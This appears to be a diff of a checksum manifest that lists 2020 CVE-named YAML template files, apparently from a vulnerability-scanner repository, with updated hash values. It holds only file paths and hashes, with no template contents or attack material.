+http/cves/2020/CVE-2020-13158.yaml:e519e5f44d47a168e7e54bd2a643040f87a12587 +http/cves/2020/CVE-2020-13167.yaml:ec08b3533526649fedf57311f268a9ffe02111c0 +http/cves/2020/CVE-2020-13258.yaml:4c4cb4659c8f357321d694522d65826a3acf4bd1 +http/cves/2020/CVE-2020-13379.yaml:39b1b8be9597f4b7462ed539822547363be526c3 +http/cves/2020/CVE-2020-13405.yaml:f1b58b0c636370023d623a044ba4d3efea0ace21 +http/cves/2020/CVE-2020-13483.yaml:32a74a6fa8b6e7d0be4e1dd3ba8e4ece9b9c8690 +http/cves/2020/CVE-2020-13638.yaml:6e6e5cd076e33bed8d1286c075b177ef15e0faf1 http/cves/2020/CVE-2020-13700.yaml:33340a13d53c725023e61b3a6a08233a924c9584 -http/cves/2020/CVE-2020-13820.yaml:f086d3a425e3df203ee9494f60298903e18b8908 -http/cves/2020/CVE-2020-13851.yaml:1c69b7e31eae6d20b1256497c1e1c54b258e25ea -http/cves/2020/CVE-2020-13927.yaml:95f52804c9dbb6945f9f695890e1463749e6dc84 -http/cves/2020/CVE-2020-13937.yaml:b900a130f56309cb0078d02a0d75ccfe5b748194 +http/cves/2020/CVE-2020-13820.yaml:11f946bd8460d570a9261e70c95e2d4926e26f20 +http/cves/2020/CVE-2020-13851.yaml:cd0d582d6ac0937cb331cc5ce7c672d8554dc097 +http/cves/2020/CVE-2020-13927.yaml:091aa2c66d885bf9cac55fc9df4015d6dd8ca3a0 +http/cves/2020/CVE-2020-13937.yaml:7384b1f6df654558f2d75603bda7d6645e672099 http/cves/2020/CVE-2020-13942.yaml:0b3b785fa8404e80153dc4a82d8a016e432b4d4e -http/cves/2020/CVE-2020-13945.yaml:00ce29da8821ba109bf480c70d67d6dcfc8faa5b +http/cves/2020/CVE-2020-13945.yaml:52eb28eaa2b449d7e0d7589e9c1a074379330d3c http/cves/2020/CVE-2020-14092.yaml:75a0892c9809a6c1abd7e4cc3d799a44cb88399d -http/cves/2020/CVE-2020-14144.yaml:de3bf41f10763111ab2ac8678715443f14755a1e -http/cves/2020/CVE-2020-14179.yaml:7c170559bfd46eb1f098ecd9433cb5962fe39d77 -http/cves/2020/CVE-2020-14181.yaml:a7670d91dac7816bc358f8c2bcb62a859b1aa8d3 -http/cves/2020/CVE-2020-14408.yaml:5ecf5a403a71a2a2ee721a0e9665bec2a4d0892d -http/cves/2020/CVE-2020-14413.yaml:1bd09b57c6c8840e671826d3d320fc072496823c -http/cves/2020/CVE-2020-14750.yaml:ef8663d1cfe855ac0400166121b550a2bb617309 -http/cves/2020/CVE-2020-14864.yaml:87bf1db7002cd028bbaceb5edc5e5388e676a2e9 -http/cves/2020/CVE-2020-14882.yaml:3aee0708f2ae7f6ee9d9d98036ef6600df3f93e1 -http/cves/2020/CVE-2020-14883.yaml:3e3d7b25a3bccd2e874fe539d1dcf5efdf13598f +http/cves/2020/CVE-2020-14144.yaml:71a68a2ba690ba91b57b5a841b65063acf027bf6 +http/cves/2020/CVE-2020-14179.yaml:02650cac88b4b63facf059a03d70b38a454a5f4e +http/cves/2020/CVE-2020-14181.yaml:c8c6b6dcfd2a9d5fa3e6d18f0f360d3b13e0a4f3 +http/cves/2020/CVE-2020-14408.yaml:38404424dc18ecb1567f9616b870eac945064f4f +http/cves/2020/CVE-2020-14413.yaml:bd2640f4d67b741a9ca405cacbafdb65d02d6a61 +http/cves/2020/CVE-2020-14750.yaml:f93fa338bc9aff0897db541ccfe290675a38d5a3 +http/cves/2020/CVE-2020-14864.yaml:02384242a01304c27bfc479d385b6a8b345e51e5 +http/cves/2020/CVE-2020-14882.yaml:1274cc4f172ee44d08fcaed8b0cb877b0ead846f +http/cves/2020/CVE-2020-14883.yaml:157377c7b25c726f3522c40bca02085f454b39c0 http/cves/2020/CVE-2020-15050.yaml:ff53982b1660dbacf0082093c19954ccd1597228 -http/cves/2020/CVE-2020-15129.yaml:c07785a9275455945fe8e675e5833c4ed124ec93 -http/cves/2020/CVE-2020-15148.yaml:e453aabff7dfda3a671b847d7b2648e2ab52ed3f -http/cves/2020/CVE-2020-15227.yaml:ed721a2d4c39a7b1231ca59f538153370217532e -http/cves/2020/CVE-2020-15500.yaml:b80e7228d9b90fc7824b871f8b16eb6c3ac6ec32 +http/cves/2020/CVE-2020-15129.yaml:fe1867b21cf9670f45b1adf0da114bb61e374bd4 +http/cves/2020/CVE-2020-15148.yaml:1818ce67c964234a5007c23b04a0bf8972c127b2 +http/cves/2020/CVE-2020-15227.yaml:3399ba0c6fff5fe804a1613132ead0c946fb0728 +http/cves/2020/CVE-2020-15500.yaml:75f7b62a818f3845bb533cfbb29cf78bdff68d95 http/cves/2020/CVE-2020-15505.yaml:e6a491c737cc161a2f84ccf4adebee81a745337b -http/cves/2020/CVE-2020-15568.yaml:203c9a51e859837c893bdfb5eba736406670420f -http/cves/2020/CVE-2020-15867.yaml:25c54a61eedf2580bbf2304c6ab3c3f6ba945654 -http/cves/2020/CVE-2020-15895.yaml:2e8edcabc2258180e398d26769c2a347d21a9e09 +http/cves/2020/CVE-2020-15568.yaml:0884dd4a2c77ae056269ca663d8253757fd049bb +http/cves/2020/CVE-2020-15867.yaml:2d45f24936bc47c49c09b9f7ff40ab464df08931 +http/cves/2020/CVE-2020-15895.yaml:38869acd8fa5e6b059565ad54e6fee143f41abb9 http/cves/2020/CVE-2020-15920.yaml:b9bce590c1d6a4a2950e930ec84e5bd343fd1cf1 -http/cves/2020/CVE-2020-16139.yaml:47491567138b40f513976c442a929d1a1d45e20b -http/cves/2020/CVE-2020-16846.yaml:ed64b05db25e3391086736114330fca043564cf7 -http/cves/2020/CVE-2020-16952.yaml:855ef66059d537f337c286915ff3ecef82724d73 -http/cves/2020/CVE-2020-17362.yaml:12e90856b34ac06db9d68a267c83442f8b36dc97 -http/cves/2020/CVE-2020-17453.yaml:54e710d28087b56a97932478496448fc392951bc -http/cves/2020/CVE-2020-17456.yaml:e4d357ff92d873d41376c7b79a1f518893df1e45 -http/cves/2020/CVE-2020-17463.yaml:29e89de402c5bf2755d1203ec543c8a4c6d5836d -http/cves/2020/CVE-2020-17496.yaml:f2c8075b728119cade8e9670db347e016d0ed081 -http/cves/2020/CVE-2020-17505.yaml:3fc856c405b9d3ce267495bdf84d6cf8450a8698 +http/cves/2020/CVE-2020-16139.yaml:d6f5ca556451807e2d514d69af0ec61298cf723d +http/cves/2020/CVE-2020-16846.yaml:56d1ad720f2676a700fe9fcbdd8621a5f3538796 +http/cves/2020/CVE-2020-16952.yaml:4ce0a0c082be805c3dd4822bd5214d0e4400e6ce +http/cves/2020/CVE-2020-17362.yaml:73c86a5a4a59e4f50fa8943fc437acfef4d14c78 +http/cves/2020/CVE-2020-17453.yaml:09430bfffaa517528900fefef8ab4890595a7c6c +http/cves/2020/CVE-2020-17456.yaml:36bc3b3b798495d74160cedf8747faf400c93ad1 +http/cves/2020/CVE-2020-17463.yaml:9f44d84da08522dba61582a66775eafae5f8c65e +http/cves/2020/CVE-2020-17496.yaml:10f0b2f5ddd4b1e70c2be7e8a9b3e117e4b69ee7 +http/cves/2020/CVE-2020-17505.yaml:98f54ae7112117d8e7d0c1513d751e16279e93a5 http/cves/2020/CVE-2020-17506.yaml:2f42db756532bb7ed6eccaa22dc4196fb4e41c4a http/cves/2020/CVE-2020-17518.yaml:d81d48cbbd5df9824834f232c4c3ee0ecbe19d6f -http/cves/2020/CVE-2020-17519.yaml:28253c1983a82cee042980cfd0bef149fabf7ed6 -http/cves/2020/CVE-2020-17526.yaml:4ba2549b99a0073f587f3ac9420153e7ecedf330 -http/cves/2020/CVE-2020-17530.yaml:0824e5803fd53b497a41a4ee6a5dbfdc19eaea83 -http/cves/2020/CVE-2020-18268.yaml:cca1efded5674d028862ae277702b184c2fc5686 -http/cves/2020/CVE-2020-19282.yaml:70979b7fd446e0900faa2e234ecb470753dfd262 -http/cves/2020/CVE-2020-19283.yaml:1e5211578ecb8ecc871c90a65975e7b45d7f9758 +http/cves/2020/CVE-2020-17519.yaml:8b707e9dceb3975811ea8078b618c9e5d26819e7 +http/cves/2020/CVE-2020-17526.yaml:5266ff4a738dc93c9723af9e13d42a9178387ef7 +http/cves/2020/CVE-2020-17530.yaml:dca2405f9cd4e46c7ef764be6e4f7c8a3a81bb8b +http/cves/2020/CVE-2020-18268.yaml:6fd016f916dccfaa0d8a8ba365b143966bab3b49 +http/cves/2020/CVE-2020-19282.yaml:d7d60fd2197a68c7de77f8bbf6f166bdc977124b +http/cves/2020/CVE-2020-19283.yaml:23c95bd3067b4da3a55e3410e3658758b7aa4fd9 http/cves/2020/CVE-2020-19295.yaml:60d3dd84486b18da0358042732bec6e88c6cc771 -http/cves/2020/CVE-2020-19360.yaml:f54f5ab5917adf0baba0eea9ffb25ae6ab7a2dbe -http/cves/2020/CVE-2020-1943.yaml:832060129d1f3c91a51f41a15d7f1943944641eb -http/cves/2020/CVE-2020-19515.yaml:c74e6d116ade83c782a813e739811e563ff39756 -http/cves/2020/CVE-2020-1956.yaml:e208ea1467b8d468e37bfcfb9911a1f965cd7572 +http/cves/2020/CVE-2020-19360.yaml:9886ca3068574343a897d86700121d2f07afc83d +http/cves/2020/CVE-2020-1943.yaml:4b0f1287b33da1578b3f6e95a602925dfa15c05f +http/cves/2020/CVE-2020-19515.yaml:b59aebca0899304e6542d3c0bf42356d86a38d46 +http/cves/2020/CVE-2020-1956.yaml:e39efd627a666be39c486b9aeeaa316d2795d820 http/cves/2020/CVE-2020-19625.yaml:c838f4924ba3563572ed00d81634424490d317b4 -http/cves/2020/CVE-2020-20285.yaml:97c2daa0903995155b3c319d2cedeec2477bb5b8 -http/cves/2020/CVE-2020-20300.yaml:9695e60a614334c018bc667dc010c9f01ca59913 -http/cves/2020/CVE-2020-2036.yaml:2df878088d96ad05fcdee31970fc4aa430666c88 -http/cves/2020/CVE-2020-2096.yaml:604550a7f7977ee5e1980ab807019da472433fa2 -http/cves/2020/CVE-2020-20982.yaml:8bd093282b67d342b92002a85e671108b46a2608 +http/cves/2020/CVE-2020-20285.yaml:e6ca53b6da7cd8dd11006df026e5fc078a0aa084 +http/cves/2020/CVE-2020-20300.yaml:3364cc2abdd56679c558378f729b5e1f602b557b +http/cves/2020/CVE-2020-2036.yaml:5aa5c433b3ca32d9b8ce53aba859d520db030498 +http/cves/2020/CVE-2020-2096.yaml:aaa5c06f47b830ac7c52a31212f767151e078a05 +http/cves/2020/CVE-2020-20982.yaml:538d3beb3a9976144b2a6a10e8fa30af220dd0d4 http/cves/2020/CVE-2020-20988.yaml:639c85d1714dbddbfd9e4b8db0fbce4a5ac90b54 -http/cves/2020/CVE-2020-21012.yaml:eb38856f0cd1394e96a25ad58747944fc74e9d06 -http/cves/2020/CVE-2020-2103.yaml:b4b23de5027241fffef5e5c9699760de8ded2d45 +http/cves/2020/CVE-2020-21012.yaml:03a5be731cfd6bf8b8e6d82c5ee1aded97e6e695 +http/cves/2020/CVE-2020-2103.yaml:6340b06f77e921e1b4c2fcf58c6f7119fec5faee http/cves/2020/CVE-2020-21224.yaml:9215850ea5836ba8924a9492ebfdd2f6a56e0ecb -http/cves/2020/CVE-2020-2140.yaml:a64a2b9363ac7e1dad3fe84be28242a52d49d610 -http/cves/2020/CVE-2020-22208.yaml:18bc41bafd7e5cf4fd8298da2627cce27ec09a33 -http/cves/2020/CVE-2020-22209.yaml:253697c3e817bc5f4fb695cf2e14319bfa55358b -http/cves/2020/CVE-2020-22210.yaml:7da9ba29c3ea1f1fc49d299c58d706588985ec7b -http/cves/2020/CVE-2020-22211.yaml:23709d74423456f7096fa167921c7470d6b27613 +http/cves/2020/CVE-2020-2140.yaml:278c2662d3e3830d9336cb5c74086e11b5e9c97e +http/cves/2020/CVE-2020-22208.yaml:2e9b83fc8a0ee7227ee868b6df9ccb784c640d7f +http/cves/2020/CVE-2020-22209.yaml:a0db814438b2e60b811804f05fd222ad59ae0c65 +http/cves/2020/CVE-2020-22210.yaml:3b5e8ebc6acfc8fa158efffc8f06523b00d952c3 +http/cves/2020/CVE-2020-22211.yaml:f879a2c4d79aa01c1792e457a0d9b44a9888c361 http/cves/2020/CVE-2020-22840.yaml:6c6cad1388bb2ab7192fec9a483e3a8f3edb4547 -http/cves/2020/CVE-2020-23015.yaml:b3346c6e48dedf09b34f6536a4587e45ca64bce6 -http/cves/2020/CVE-2020-23517.yaml:73756be29508961bb810d8e834dbc72405a9b795 -http/cves/2020/CVE-2020-23575.yaml:34feab963e6f827c990da7425411850158b98da7 -http/cves/2020/CVE-2020-23697.yaml:66c34a7b7282b992e375c0744730d026682142fa +http/cves/2020/CVE-2020-23015.yaml:ef79be791a7a626c839061dcf881161a0234c38e +http/cves/2020/CVE-2020-23517.yaml:7f6751c9864765646315890d0899439d10142df9 +http/cves/2020/CVE-2020-23575.yaml:67ab082068717a9921ae80d3394859c74d1398ac +http/cves/2020/CVE-2020-23697.yaml:ad5a719d4e93a26db478bd8c3f4245db3515b06e http/cves/2020/CVE-2020-23972.yaml:c1383a5e782d88347b1ace6499e3c8e148aad5c4 -http/cves/2020/CVE-2020-24148.yaml:68cd11ce743eac9ed781b865de8a9d6f066af84e -http/cves/2020/CVE-2020-24186.yaml:6d6d875a225e3d8483cedea3d18be5d10eed6668 +http/cves/2020/CVE-2020-24148.yaml:828c203ffd58618490347102066f2f539d9116af +http/cves/2020/CVE-2020-24186.yaml:25250262fde4e0a9d147c93c2f88bd9cbb775129 http/cves/2020/CVE-2020-24223.yaml:3dcce16e9d8be524d4f16ebc04564135e16a5df3 -http/cves/2020/CVE-2020-24312.yaml:64454cabae9f19c9ff900daf8206d16dcfd97091 -http/cves/2020/CVE-2020-24391.yaml:3cd35fe6417b0647ce50bbc4a16996c8c8981fb2 +http/cves/2020/CVE-2020-24312.yaml:c504548af3d920be3be02e59c790bd7690154549 +http/cves/2020/CVE-2020-24391.yaml:317ba4c2e9e25a10d25a10a73e36e95752099d9d http/cves/2020/CVE-2020-24550.yaml:df5052c65b1037f38f8ed25cb384ec4c54f81b8c http/cves/2020/CVE-2020-24571.yaml:5c31b80a9c7ae3e327ea91a5112b930676527155 -http/cves/2020/CVE-2020-24579.yaml:bd9a169a4c1af3ff65b5466200ab4d7989af7a04 -http/cves/2020/CVE-2020-24589.yaml:d26d02bb554d34740163c2cb502b03bd0bb108c0 -http/cves/2020/CVE-2020-24701.yaml:e39f30359517b3d238c0f047b7ded94881e69a14 -http/cves/2020/CVE-2020-24902.yaml:1259b4854191d05b01caa8d1b7f1e845b6cd04cf -http/cves/2020/CVE-2020-24903.yaml:89bf3a81d901c9d7364475f05800d40065327228 -http/cves/2020/CVE-2020-24912.yaml:a5df47738a105f4c07e66c50d21622c2fb4d8ed9 +http/cves/2020/CVE-2020-24579.yaml:62759de772a6d5027e0dcdd5964ce4cc03194022 +http/cves/2020/CVE-2020-24589.yaml:9fdcb854777f1f0f4db18d334f9c769384a71d5c +http/cves/2020/CVE-2020-24701.yaml:6782e29645189f99e7d44df42c067f0e0be0de46 +http/cves/2020/CVE-2020-24902.yaml:fb8e001d6a2081b3a0328a714577005efea05db6 +http/cves/2020/CVE-2020-24903.yaml:51a953c902a4c738e3a11a376fab3fd9baddbf16 +http/cves/2020/CVE-2020-24912.yaml:9a5855c216f6eb711710ff74138e2d615ebe5cfd http/cves/2020/CVE-2020-24949.yaml:75e53db8ae949b1e8991bcf5b51fc2afd196c6bc http/cves/2020/CVE-2020-25078.yaml:d2e80d7483241efcdeaeec253eee58e18089501b -http/cves/2020/CVE-2020-25213.yaml:cc2572578c2f5bf8269c6b208b3939987c2d18ef -http/cves/2020/CVE-2020-25223.yaml:b2c1068143116b03e67b909cb00887d396c28d92 +http/cves/2020/CVE-2020-25213.yaml:2b4d15844a75b3c8b331efd61791d2a8cb3cf8e0 +http/cves/2020/CVE-2020-25223.yaml:a3693fe0f645932d320d2ab0ff173c31744f0850 http/cves/2020/CVE-2020-25495.yaml:046e0a535a8b9fd74f70e1ff2d90dbef6e20c658 -http/cves/2020/CVE-2020-25506.yaml:27620edd7c191f6c5f918ec2546c7de54e9124cb -http/cves/2020/CVE-2020-2551.yaml:2b7bf0bb7f84d06e15d8d41c964ad58491c0126f -http/cves/2020/CVE-2020-25540.yaml:b1b69542b3b044d72ae7f85052d20bd2922056eb +http/cves/2020/CVE-2020-25506.yaml:883657db91c0d3f56d9828180b950d477af18999 +http/cves/2020/CVE-2020-2551.yaml:e7b2ae758383e6f1d3f2de83a8b4d9c0fdb9aa73 +http/cves/2020/CVE-2020-25540.yaml:b982bfa81fcb18ff4ae12e6075875a032eac51a9 http/cves/2020/CVE-2020-25780.yaml:3983db60c1ca28a8c7999041013ab96f5c896a9f -http/cves/2020/CVE-2020-25864.yaml:7ba0c416fbc580ffa8eb8f8fc337a77cd4a76b6c +http/cves/2020/CVE-2020-25864.yaml:574a13cfef80f75cb0712172cc55e41cdbd495f1 http/cves/2020/CVE-2020-26073.yaml:793eb5c47388abfea3111d98fc083ef549f2f51f http/cves/2020/CVE-2020-26153.yaml:455c58760238ddd079e51172072ef963e95e58ec -http/cves/2020/CVE-2020-26214.yaml:e15fb53018e98df0c349367eab19c2ae3d851d77 -http/cves/2020/CVE-2020-26217.yaml:8d3e7b139f7edff0496b2776f409f072bf153d55 +http/cves/2020/CVE-2020-26214.yaml:c9550b0a95085975804bf0adf411947d89925d2e +http/cves/2020/CVE-2020-26217.yaml:22e1a3fe2541425175198c852f37d342fbb87a0a http/cves/2020/CVE-2020-26248.yaml:7c31fd4f253b81b3afe18098ea3b7db896f1efd7 http/cves/2020/CVE-2020-26258.yaml:da846b0baeb41eb83b4c8ac05986b1eb0be6a1af -http/cves/2020/CVE-2020-26413.yaml:c6ae98d72b9daec71461b2c86159c469efa8fb32 +http/cves/2020/CVE-2020-26413.yaml:d73538b5a598487cf0268b6b031b25613718f92f http/cves/2020/CVE-2020-26876.yaml:cddbbb81ba783c1c427b257e9caae9d9c0fa976a http/cves/2020/CVE-2020-26919.yaml:1f958ae88864447bcb937900bf0a813a033204b5 -http/cves/2020/CVE-2020-26948.yaml:cdadfb9ba6724ecfdd94740c729a0e0c443a3036 +http/cves/2020/CVE-2020-26948.yaml:513d547c9b9f5ef43299cb380687dd64caaced81 http/cves/2020/CVE-2020-27191.yaml:4de1b9dd94d0973bfb7b1e6315d254603c5f1765 -http/cves/2020/CVE-2020-2733.yaml:a448094a7e74f2e3b6604186adbca425e3cec908 +http/cves/2020/CVE-2020-2733.yaml:e85d06ccdfb80f6d6628798106813cb79aae0c9d http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371 -http/cves/2020/CVE-2020-27467.yaml:e190b3c2d91f742f916a82030de9b4d8221b4e9b -http/cves/2020/CVE-2020-27481.yaml:1c6c8f8e84d22f9aa0ea5d634a3adff940839765 +http/cves/2020/CVE-2020-27467.yaml:9a74107153a3d881f4de65787037fea872e05808 +http/cves/2020/CVE-2020-27481.yaml:4b32a25c1171a8bbe3a79021d69aa408eb6b4d5c http/cves/2020/CVE-2020-27735.yaml:c11acea90495bacb3b3e5cd069b49cbc543621e7 -http/cves/2020/CVE-2020-27838.yaml:f5d793dca6b37d410967a3a4c355b9aec9093594 -http/cves/2020/CVE-2020-27866.yaml:48b6550611c83a6d35f2437e66a0031e51f1930a -http/cves/2020/CVE-2020-27982.yaml:a1e9d4dd0d75d6209feb856df302363ff551e7d4 -http/cves/2020/CVE-2020-27986.yaml:c2668ca4f159f3302764e6c01bfb8b0303aed21b -http/cves/2020/CVE-2020-28185.yaml:2dca6d757d0230f6e3c009fd75d047a5c2d41c07 -http/cves/2020/CVE-2020-28188.yaml:9328f627c742f2eba1355c3f32f933281654dfb4 -http/cves/2020/CVE-2020-28208.yaml:17f8f9f3851d089ed3ba72296ebb1901169322b4 +http/cves/2020/CVE-2020-27838.yaml:c92bb76888150f83b0a4abc33eead1b830d151e6 +http/cves/2020/CVE-2020-27866.yaml:94e95838349bf47e7bf695cdad78c991d81b11f2 +http/cves/2020/CVE-2020-27982.yaml:c67891c33b8929528dcc5a271dc50dcf68efaf65 +http/cves/2020/CVE-2020-27986.yaml:893336c14059a046c22f8cd517e66893d0139361 +http/cves/2020/CVE-2020-28185.yaml:ecfb9fcc4bbfe0937f6b99302979dec7dabc55f3 +http/cves/2020/CVE-2020-28188.yaml:c0980bcbb94378ff28df21229115235308770f13 +http/cves/2020/CVE-2020-28208.yaml:fcf8162a856d78d120573693438b0646df11a72c http/cves/2020/CVE-2020-28351.yaml:16f3808bf7037eee165ff817b9032b07cff97715 -http/cves/2020/CVE-2020-28871.yaml:67720a0089ca532649039c13100df95c7a7bc194 +http/cves/2020/CVE-2020-28871.yaml:a26b9eec2511c2ca500ebccbad87e19d81fd69e6 http/cves/2020/CVE-2020-28976.yaml:598019c32cb4b0e55d77f7c45f1ba39593debba3 -http/cves/2020/CVE-2020-29164.yaml:a7821d97ab89dafa618381c5df70b60fd8657b44 -http/cves/2020/CVE-2020-29227.yaml:122475843b9e415cf59e2ed0b4dc9b2ac9c00cb4 -http/cves/2020/CVE-2020-29284.yaml:20abe2012386881cc230cd068b1fe4084fc25f5b -http/cves/2020/CVE-2020-29395.yaml:b0aa043c5646021dc76bb08b9b1e1ba1f8a569bc +http/cves/2020/CVE-2020-29164.yaml:b22ac231890e04ebe3bd4842f48b8b75dfa68807 +http/cves/2020/CVE-2020-29227.yaml:014575ac4dec53a13f8dd825cff7a84066f0ae9c +http/cves/2020/CVE-2020-29284.yaml:80a4ee991c7571f79905e18861b3dd84a62689b5 +http/cves/2020/CVE-2020-29395.yaml:16cb6925395ccc7b50f83f03eaca8e71deaa0675 http/cves/2020/CVE-2020-29453.yaml:36f8bba4fdee54e96e54f2132471c8bddf38fdb9 -http/cves/2020/CVE-2020-29583.yaml:1eb6c3ab90222daf4aa8b2b2599b0d11e7db9086 +http/cves/2020/CVE-2020-29583.yaml:0086f54be23a01d66cf70629291399c856783530 http/cves/2020/CVE-2020-29597.yaml:0784e4768d628b088948e4409de7690b6b28dc4c http/cves/2020/CVE-2020-3187.yaml:633d566201388dc1399f783b58cfc07f94d4aa51 -http/cves/2020/CVE-2020-3452.yaml:462a13a55603fea601a5eb04361ebb262a5ae885 -http/cves/2020/CVE-2020-35234.yaml:e4bb78015e568be11dc80c12b7f7c6482b2ba820 -http/cves/2020/CVE-2020-35338.yaml:41c7d218db18df546ef3f07ef88cf08fa1fa7d5c -http/cves/2020/CVE-2020-35476.yaml:26ffaf11a97ed264f91c9bf66bb10aa8a5e34c80 -http/cves/2020/CVE-2020-35489.yaml:1f8813c310acbbae92d71094491480f81093c9a1 -http/cves/2020/CVE-2020-35580.yaml:752ba7e807215ff1529be07163304e5a8ea77681 -http/cves/2020/CVE-2020-35598.yaml:fa4d75367df143b4d76d19189fb76471e81fb318 -http/cves/2020/CVE-2020-35713.yaml:04bd22c97e914a61aa173271bcc13b87474b2cd0 +http/cves/2020/CVE-2020-3452.yaml:4171936b0f65db2e31afd0b4a9157a048ec3eb91 +http/cves/2020/CVE-2020-35234.yaml:59dfdc805ed104edcb3cd667ec5f602c0e594cb9 +http/cves/2020/CVE-2020-35338.yaml:b9e1195c81bf31210947ca6f71147321930b90c1 +http/cves/2020/CVE-2020-35476.yaml:45668b616ae0a566d94ced220663dca18327b3b3 +http/cves/2020/CVE-2020-35489.yaml:950d6dbeed43968347cb9c634c5d4c3b3e0e2853 +http/cves/2020/CVE-2020-35580.yaml:5ce1a1e4040aaa35ba363d08f013c0fe525534bb +http/cves/2020/CVE-2020-35598.yaml:5e721e6213989f337663289eff70cf95418401a2 +http/cves/2020/CVE-2020-35713.yaml:2da565a85a1f7e90b28df0608bf2b6c8832c23dd http/cves/2020/CVE-2020-35729.yaml:c7598a948f72654439744155ace7dfe699bba00b -http/cves/2020/CVE-2020-35736.yaml:0595a14d942c7a19718ad31a79b197ca18066615 +http/cves/2020/CVE-2020-35736.yaml:496c42f5b621668efe592864a945cb3f45d73b8d http/cves/2020/CVE-2020-35749.yaml:8c7c7cb6375f279b172fd6db9e37182ff10b0d3d http/cves/2020/CVE-2020-35774.yaml:04828fe9dc9b3cc64c404c9f22d4f2c4746cb04f -http/cves/2020/CVE-2020-3580.yaml:5c17b9207ede49ea379376451f152493405eff3b -http/cves/2020/CVE-2020-35846.yaml:ad9de8cafbad528bd0f4f922e27014c92520ac09 -http/cves/2020/CVE-2020-35847.yaml:4636a8b6bdb0fe4822f990c002df088e792e6c63 -http/cves/2020/CVE-2020-35848.yaml:3afcd9e68aebe83507ece244d39fd96365f70338 +http/cves/2020/CVE-2020-3580.yaml:d1950f88016803a9adf2de04b9f8d0d931fa1f12 +http/cves/2020/CVE-2020-35846.yaml:6b6789e6b946872f89459f2aa77c417067cfecb1 +http/cves/2020/CVE-2020-35847.yaml:c47e2427d3c1c33454343fd46d15ce6d27b767ff +http/cves/2020/CVE-2020-35848.yaml:27044a536ef83bb5fbac8083e22dc99e4f5be3a4 http/cves/2020/CVE-2020-35951.yaml:8a82a09c399a210010151ef2b26290cb8b3c32dd -http/cves/2020/CVE-2020-35984.yaml:93e524409cf0b23db0b70db6f0094cfba52efb13 -http/cves/2020/CVE-2020-35985.yaml:ce48524c08b761ebcc575ef02765314669b5b30d -http/cves/2020/CVE-2020-35986.yaml:c76e52d22ba5e6d8fcc101ed81be8d25dce67962 -http/cves/2020/CVE-2020-35987.yaml:8d0b095e54b481e7d92d1a54504349d00471b8b1 -http/cves/2020/CVE-2020-36112.yaml:f2bf094fac8f1cdfe6a1a346cdbe6be8c7601124 -http/cves/2020/CVE-2020-36289.yaml:d297dd28860670463adcfcf6672f82e9faa1eadc -http/cves/2020/CVE-2020-36365.yaml:9a13b03b380ad3e190bfe456dd8c9e3628778dd2 +http/cves/2020/CVE-2020-35984.yaml:73026939fceebcf822ec1708bc95bf679a9222c5 +http/cves/2020/CVE-2020-35985.yaml:a9ca41b022487d171f723c4aea91fbe6013875f6 +http/cves/2020/CVE-2020-35986.yaml:1ef91cc97a2ac750b377702b293d5f9218023ff0 +http/cves/2020/CVE-2020-35987.yaml:40f2fbbdfbf459fd19272719b14853a9a059b2df +http/cves/2020/CVE-2020-36112.yaml:e52719830bf2eca68effb4397eadb8b8281338f3 +http/cves/2020/CVE-2020-36289.yaml:52f5ae4cb45c093b1f4d6e1dea3bd83cb716bb59 +http/cves/2020/CVE-2020-36365.yaml:b4678231c734f5b6508a8c3a65fc970b6e5b78b5 http/cves/2020/CVE-2020-36510.yaml:43288de50cb0daa7560d3c49ab9cb662ec943aaa -http/cves/2020/CVE-2020-4463.yaml:ba0839c3361367e1ce876c8964a18fd9822b4c18 -http/cves/2020/CVE-2020-5191.yaml:0f273b6b9bfac5701e3dda3504bd7f642d9265fb -http/cves/2020/CVE-2020-5192.yaml:b186c3cb44c730fb83ebafec8bdc72e706e559a1 -http/cves/2020/CVE-2020-5284.yaml:e0f1b069ab0fc3bc4860d6f29c8b66e56fd6c17c +http/cves/2020/CVE-2020-4463.yaml:644d422d8b7c29684081b2ba722c6c8c49dc82a2 +http/cves/2020/CVE-2020-5191.yaml:9a3a930e48da4976766fbacc6722bb8b6c262c7a +http/cves/2020/CVE-2020-5192.yaml:11f227839a3375c5d6e419bea5f60366f243ad94 +http/cves/2020/CVE-2020-5284.yaml:b6b8aea66dad94861b5d57694e171ae609077f96 http/cves/2020/CVE-2020-5307.yaml:5f2c1c7f8182d01ef6c0cab9b090f901f4e91865 http/cves/2020/CVE-2020-5405.yaml:362a063401b8e384df88fcc1f958163e9d355922 -http/cves/2020/CVE-2020-5410.yaml:ee5446048d5570981b1f589cfb8ac45765961762 +http/cves/2020/CVE-2020-5410.yaml:15ef6b720233bda3b0a3bd22593417fa44f7cbc7 http/cves/2020/CVE-2020-5412.yaml:52fe5ee1514d295e0ed4f0e29db378764c447047 http/cves/2020/CVE-2020-5775.yaml:cbcbf5ab4ce79076fa4f024290982f26ab44323c http/cves/2020/CVE-2020-5776.yaml:ddddb7cd7126aa41e107c0211722da5abebeb87f -http/cves/2020/CVE-2020-5777.yaml:fb86884641fca57dacff56448df790c077a8016b +http/cves/2020/CVE-2020-5777.yaml:414c353b95c77dcfe1220fd5926ec149093e59fa http/cves/2020/CVE-2020-5847.yaml:8a1c0ba47de6c6cd63ede6605bd99f7f7d2bc88a -http/cves/2020/CVE-2020-5902.yaml:fd6fead0ec016d1c3250bd3639df8aa3e3d7a3c6 -http/cves/2020/CVE-2020-6171.yaml:3b54178dd588febab96bc70b34ec3a9684031593 -http/cves/2020/CVE-2020-6207.yaml:88f82f2f4117df59a21bee30dabc2dbbbd55752a -http/cves/2020/CVE-2020-6287.yaml:7a1d843909ee9d794e9e8c541625d5522d360537 +http/cves/2020/CVE-2020-5902.yaml:4bcd2da425ead756fa38a85226bd3b7109824dd5 +http/cves/2020/CVE-2020-6171.yaml:7485379a4227df9a0668ace45ac89daeb1a1445c +http/cves/2020/CVE-2020-6207.yaml:dc2081d146a83be2fdd12363e69d48540509dc98 +http/cves/2020/CVE-2020-6287.yaml:5152426f4629703328b66fa272f3ca9137e59d5f http/cves/2020/CVE-2020-6308.yaml:662c78d7be59c6090f8ab983b9aecbe01757cae6 -http/cves/2020/CVE-2020-6637.yaml:028c3cea7cb4b979332c21866571714765fc3eda -http/cves/2020/CVE-2020-6950.yaml:fd7c7f30283610f8b86244eb4b0849da960e6e2e -http/cves/2020/CVE-2020-7107.yaml:1214b3094b6e6ac77539f71ee51c3585315222d8 -http/cves/2020/CVE-2020-7136.yaml:dc5c71c2c26cb8517198425acbdf352592e05265 +http/cves/2020/CVE-2020-6637.yaml:c9a81cd46d9ac5a913e1ae089e5a06c613aadbd8 